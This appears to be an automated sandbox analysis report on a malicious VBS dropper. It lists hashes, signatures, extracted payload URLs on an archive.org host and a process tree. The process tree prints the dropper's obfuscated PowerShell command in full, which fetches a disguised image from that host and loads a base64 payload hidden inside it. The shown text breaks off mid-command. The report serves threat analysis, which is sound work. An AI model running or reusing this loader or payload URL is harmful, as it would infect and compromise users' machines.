3179c9bc6e97029cde5ec068cdb9688110881e7b2454c6ec3d44196f7ce03a94

General

Target

3179c9bc6e97029cde5ec068cdb9688110881e7b2454c6ec3d44196f7ce03a94.vbs
Size

184KB
MD5

ade5d61e34f752b0896abd6f2cbeb099
SHA1

0bc7c2bd8b3e63693e50f73d36403737c294044f
SHA256

3179c9bc6e97029cde5ec068cdb9688110881e7b2454c6ec3d44196f7ce03a94
SHA512

c8027ac133eb6321098da7e0b7c8680cc9e1265e5f1b9128dde4ff90f1059ddd49a870c77afd94521a43c94db8e75ea3bb86acb992002a19c83ab06e7329a4aa
SSDEEP

3072:HscEXcKWZQPAOW4m0gt5p3Gw6OL8irybENY812OH39D:HsckcbQPAOW4OND

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2764	powershell.exe
6	2764	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2596	powershell.exe
2764	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2596	powershell.exe
2764	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 2596	2220	WScript.exe	30
PID 2220 wrote to memory of 2596	2220	WScript.exe	30
PID 2220 wrote to memory of 2596	2220	WScript.exe	30
PID 2596 wrote to memory of 2764	2596	powershell.exe	32
PID 2596 wrote to memory of 2764	2596	powershell.exe	32
PID 2596 wrote to memory of 2764	2596	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3179c9bc6e97029cde5ec068cdb9688110881e7b2454c6ec3d44196f7ce03a94.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵YQBn⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵VQBy⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵9⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵JwBo⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bw⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵Og⨄ ㍴ ⨽ ㏸ ௵v⨄ ㍴ ⨽ ㏸ ௵C8⨄ ㍴ ⨽ ㏸ ௵aQBh⨄ ㍴ ⨽ ㏸ ௵Dg⨄ ㍴ ⨽ ㏸ ௵M⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵z⨄ ㍴ ⨽ ㏸ ௵DE⨄ ㍴ ⨽ ㏸ ௵M⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵0⨄ ㍴ ⨽ ㏸ ௵C4⨄ ㍴ ⨽ ㏸ ௵dQBz⨄ ㍴ ⨽ ㏸ ௵C4⨄ ㍴ ⨽ ㏸ ௵YQBy⨄ ㍴ ⨽ ㏸ ௵GM⨄ ㍴ ⨽ ㏸ ௵a⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵HY⨄ ㍴ ⨽ ㏸ ௵ZQ⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵G8⨄ ㍴ ⨽ ㏸ ௵cgBn⨄ ㍴ ⨽ ㏸ ௵C8⨄ ㍴ ⨽ ㏸ ௵Mg⨄ ㍴ ⨽ ㏸ ௵3⨄ ㍴ ⨽ ㏸ ௵C8⨄ ㍴ ⨽ ㏸ ௵aQB0⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵bQBz⨄ ㍴ ⨽ ㏸ ௵C8⨄ ㍴ ⨽ ㏸ ௵dgBi⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵Xw⨄ ㍴ ⨽ ㏸ ௵y⨄ ㍴ ⨽ ㏸ ௵D⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵Mg⨄ ㍴ ⨽ ㏸ ௵0⨄ ㍴ ⨽ ㏸ ௵D⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵Nw⨄ ㍴ ⨽ ㏸ ௵y⨄ ㍴ ⨽ ㏸ ௵DY⨄ ㍴ ⨽ ㏸ ௵Xw⨄ ㍴ ⨽ ㏸ ௵y⨄ ㍴ ⨽ ㏸ ௵D⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵Mg⨄ ㍴ ⨽ ㏸ ௵0⨄ ㍴ ⨽ ㏸ ௵D⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵Nw⨄ ㍴ ⨽ ㏸ ௵y⨄ ㍴ ⨽ ㏸ ௵DY⨄ ㍴ ⨽ ㏸ ௵LwB2⨄ ㍴ ⨽ ㏸ ௵GI⨄ ㍴ ⨽ ㏸ ௵cw⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵Go⨄ ㍴ ⨽ ㏸ ௵c⨄ ㍴ ⨽ ㏸ ௵Bn⨄ ㍴ ⨽ ㏸ ௵Cc⨄ ㍴ ⨽ ㏸ ௵Ow⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵Hc⨄ ㍴ ⨽ ㏸ ௵ZQBi⨄ ㍴ ⨽ ㏸ ௵EM⨄ ㍴ ⨽ ㏸ ௵b⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵bgB0⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵PQ⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵E4⨄ ㍴ ⨽ ㏸ ௵ZQB3⨄ ㍴ ⨽ ㏸ ௵C0⨄ ㍴ ⨽ ㏸ ௵TwBi⨄ ㍴ ⨽ ㏸ ௵Go⨄ ㍴ ⨽ ㏸ ௵ZQBj⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵BT⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵cwB0⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵bQ⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵E4⨄ ㍴ ⨽ ㏸ ௵ZQB0⨄ ㍴ ⨽ ㏸ ௵C4⨄ ㍴ ⨽ ㏸ ௵VwBl⨄ ㍴ ⨽ ㏸ ௵GI⨄ ㍴ ⨽ ㏸ ௵QwBs⨄ ㍴ ⨽ ㏸ ௵Gk⨄ ㍴ ⨽ ㏸ ௵ZQBu⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵Ow⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵Gk⨄ ㍴ ⨽ ㏸ ௵bQBh⨄ ㍴ ⨽ ㏸ ௵Gc⨄ ㍴ ⨽ ㏸ ௵ZQBC⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵9⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵J⨄ ㍴ ⨽ ㏸ ௵B3⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵YgBD⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵aQBl⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵EQ⨄ ㍴ ⨽ ㏸ ௵bwB3⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵b⨄ ㍴ ⨽ ㏸ ௵Bv⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵BE⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bh⨄ ㍴ ⨽ ㏸ ௵Cg⨄ ㍴ ⨽ ㏸ ௵J⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵YQBn⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵VQBy⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵KQ⨄ ㍴ ⨽ ㏸ ௵7⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵aQBt⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵ZwBl⨄ ㍴ ⨽ ㏸ ௵FQ⨄ ㍴ ⨽ ㏸ ௵ZQB4⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵9⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵WwBT⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵cwB0⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵bQ⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵FQ⨄ ㍴ ⨽ ㏸ ௵ZQB4⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵LgBF⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵YwBv⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵aQBu⨄ ㍴ ⨽ ㏸ ௵Gc⨄ ㍴ ⨽ ㏸ ௵XQ⨄ ㍴ ⨽ ㏸ ௵6⨄ ㍴ ⨽ ㏸ ௵Do⨄ ㍴ ⨽ ㏸ ௵VQBU⨄ ㍴ ⨽ ㏸ ௵EY⨄ ㍴ ⨽ ㏸ ௵O⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵Ec⨄ ㍴ ⨽ ㏸ ௵ZQB0⨄ ㍴ ⨽ ㏸ ௵FM⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵By⨄ ㍴ ⨽ ㏸ ௵Gk⨄ ㍴ ⨽ ㏸ ௵bgBn⨄ ㍴ ⨽ ㏸ ௵Cg⨄ ㍴ ⨽ ㏸ ௵J⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵YQBn⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵QgB5⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵ZQBz⨄ ㍴ ⨽ ㏸ ௵Ck⨄ ㍴ ⨽ ㏸ ௵Ow⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bh⨄ ㍴ ⨽ ㏸ ௵HI⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵BG⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵YQBn⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵PQ⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵Cc⨄ ㍴ ⨽ ㏸ ௵P⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵8⨄ ㍴ ⨽ ㏸ ௵EI⨄ ㍴ ⨽ ㏸ ௵QQBT⨄ ㍴ ⨽ ㏸ ௵EU⨄ ㍴ ⨽ ㏸ ௵Ng⨄ ㍴ ⨽ ㏸ ௵0⨄ ㍴ ⨽ ㏸ ௵F8⨄ ㍴ ⨽ ㏸ ௵UwBU⨄ ㍴ ⨽ ㏸ ௵EE⨄ ㍴ ⨽ ㏸ ௵UgBU⨄ ㍴ ⨽ ㏸ ௵D4⨄ ㍴ ⨽ ㏸ ௵Pg⨄ ㍴ ⨽ ㏸ ௵n⨄ ㍴ ⨽ ㏸ ௵Ds⨄ ㍴ ⨽ ㏸ ௵J⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵BG⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵YQBn⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵PQ⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵Cc⨄ ㍴ ⨽ ㏸ ௵P⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵8⨄ ㍴ ⨽ ㏸ ௵EI⨄ ㍴ ⨽ ㏸ ௵QQBT⨄ ㍴ ⨽ ㏸ ௵EU⨄ ㍴ ⨽ ㏸ ௵Ng⨄ ㍴ ⨽ ㏸ ௵0⨄ ㍴ ⨽ ㏸ ௵F8⨄ ㍴ ⨽ ㏸ ௵RQBO⨄ ㍴ ⨽ ㏸ ௵EQ⨄ ㍴ ⨽ ㏸ ௵Pg⨄ ㍴ ⨽ ㏸ ௵+⨄ ㍴ ⨽ ㏸ ௵Cc⨄ ㍴ ⨽ ㏸ ௵Ow⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bh⨄ ㍴ ⨽ ㏸ ௵HI⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵BJ⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵Hg⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵9⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵J⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵YQBn⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵V⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵Hg⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵Ek⨄ ㍴ ⨽ ㏸ ௵bgBk⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵e⨄ ㍴ ⨽ ㏸ ௵BP⨄ ㍴ ⨽ ㏸ ௵GY⨄ ㍴ ⨽ ㏸ ௵K⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bh⨄ ㍴ ⨽ ㏸ ௵HI⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵BG⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵YQBn⨄ ㍴ ⨽ ㏸ ௵Ck⨄ ㍴ ⨽ ㏸ ௵Ow⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵bgBk⨄ ㍴ ⨽ ㏸ ௵Ek⨄ ㍴ ⨽ ㏸ ௵bgBk⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵e⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵D0⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵Gk⨄ ㍴ ⨽ ㏸ ௵bQBh⨄ ㍴ ⨽ ㏸ ௵Gc⨄ ㍴ ⨽ ㏸ ௵ZQBU⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵e⨄ ㍴ ⨽ ㏸ ௵B0⨄ ㍴ ⨽ ㏸ ௵C4⨄ ㍴ ⨽ ㏸ ௵SQBu⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵ZQB4⨄ ㍴ ⨽ ㏸ ௵E8⨄ ㍴ ⨽ ㏸ ௵Zg⨄ ㍴ ⨽ ㏸ ௵o⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵ZQBu⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵RgBs⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵Zw⨄ ㍴ ⨽ ㏸ ௵p⨄ ㍴ ⨽ ㏸ ௵Ds⨄ ㍴ ⨽ ㏸ ௵J⨄ ㍴ ⨽ ㏸ ௵Bz⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵YQBy⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵SQBu⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵ZQB4⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵LQBn⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵w⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵LQBh⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵ZQBu⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵SQBu⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵ZQB4⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵LQBn⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bh⨄ ㍴ ⨽ ㏸ ௵HI⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵BJ⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵Hg⨄ ㍴ ⨽ ㏸ ௵Ow⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bh⨄ ㍴ ⨽ ㏸ ௵HI⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵BJ⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵Hg⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵r⨄ ㍴ ⨽ ㏸ ௵D0⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bh⨄ ㍴ ⨽ ㏸ ௵HI⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵BG⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵YQBn⨄ ㍴ ⨽ ㏸ ௵C4⨄ ㍴ ⨽ ㏸ ௵T⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵ZwB0⨄ ㍴ ⨽ ㏸ ௵Gg⨄ ㍴ ⨽ ㏸ ௵Ow⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵GI⨄ ㍴ ⨽ ㏸ ௵YQBz⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵Ng⨄ ㍴ ⨽ ㏸ ௵0⨄ ㍴ ⨽ ㏸ ௵Ew⨄ ㍴ ⨽ ㏸ ௵ZQBu⨄ ㍴ ⨽ ㏸ ௵Gc⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bo⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵PQ⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵ZQBu⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵SQBu⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵ZQB4⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵LQ⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵cwB0⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵cgB0⨄ ㍴ ⨽ ㏸ ௵Ek⨄ ㍴ ⨽ ㏸ ௵bgBk⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵e⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵7⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵YgBh⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵ZQ⨄ ㍴ ⨽ ㏸ ௵2⨄ ㍴ ⨽ ㏸ ௵DQ⨄ ㍴ ⨽ ㏸ ௵QwBv⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵bQBh⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵D0⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵Gk⨄ ㍴ ⨽ ㏸ ௵bQBh⨄ ㍴ ⨽ ㏸ ௵Gc⨄ ㍴ ⨽ ㏸ ௵ZQBU⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵e⨄ ㍴ ⨽ ㏸ ௵B0⨄ ㍴ ⨽ ㏸ ௵C4⨄ ㍴ ⨽ ㏸ ௵UwB1⨄ ㍴ ⨽ ㏸ ௵GI⨄ ㍴ ⨽ ㏸ ௵cwB0⨄ ㍴ ⨽ ㏸ ௵HI⨄ ㍴ ⨽ ㏸ ௵aQBu⨄ ㍴ ⨽ ㏸ ௵Gc⨄ ㍴ ⨽ ㏸ ௵K⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bh⨄ ㍴ ⨽ ㏸ ௵HI⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵BJ⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵Hg⨄ ㍴ ⨽ ㏸ ௵L⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵YgBh⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵ZQ⨄ ㍴ ⨽ ㏸ ௵2⨄ ㍴ ⨽ ㏸ ௵DQ⨄ ㍴ ⨽ ㏸ ௵T⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵ZwB0⨄ ㍴ ⨽ ㏸ ௵Gg⨄ ㍴ ⨽ ㏸ ௵KQ⨄ ㍴ ⨽ ㏸ ௵7⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵YwBv⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵bQBh⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵BC⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵9⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵WwBT⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵cwB0⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵bQ⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵EM⨄ ㍴ ⨽ ㏸ ௵bwBu⨄ ㍴ ⨽ ㏸ ௵HY⨄ ㍴ ⨽ ㏸ ௵ZQBy⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵XQ⨄ ㍴ ⨽ ㏸ ௵6⨄ ㍴ ⨽ ㏸ ௵Do⨄ ㍴ ⨽ ㏸ ௵RgBy⨄ ㍴ ⨽ ㏸ ௵G8⨄ ㍴ ⨽ ㏸ ௵bQBC⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵cwBl⨄ ㍴ ⨽ ㏸ ௵DY⨄ ㍴ ⨽ ㏸ ௵N⨄ ㍴ ⨽ ㏸ ௵BT⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵cgBp⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ 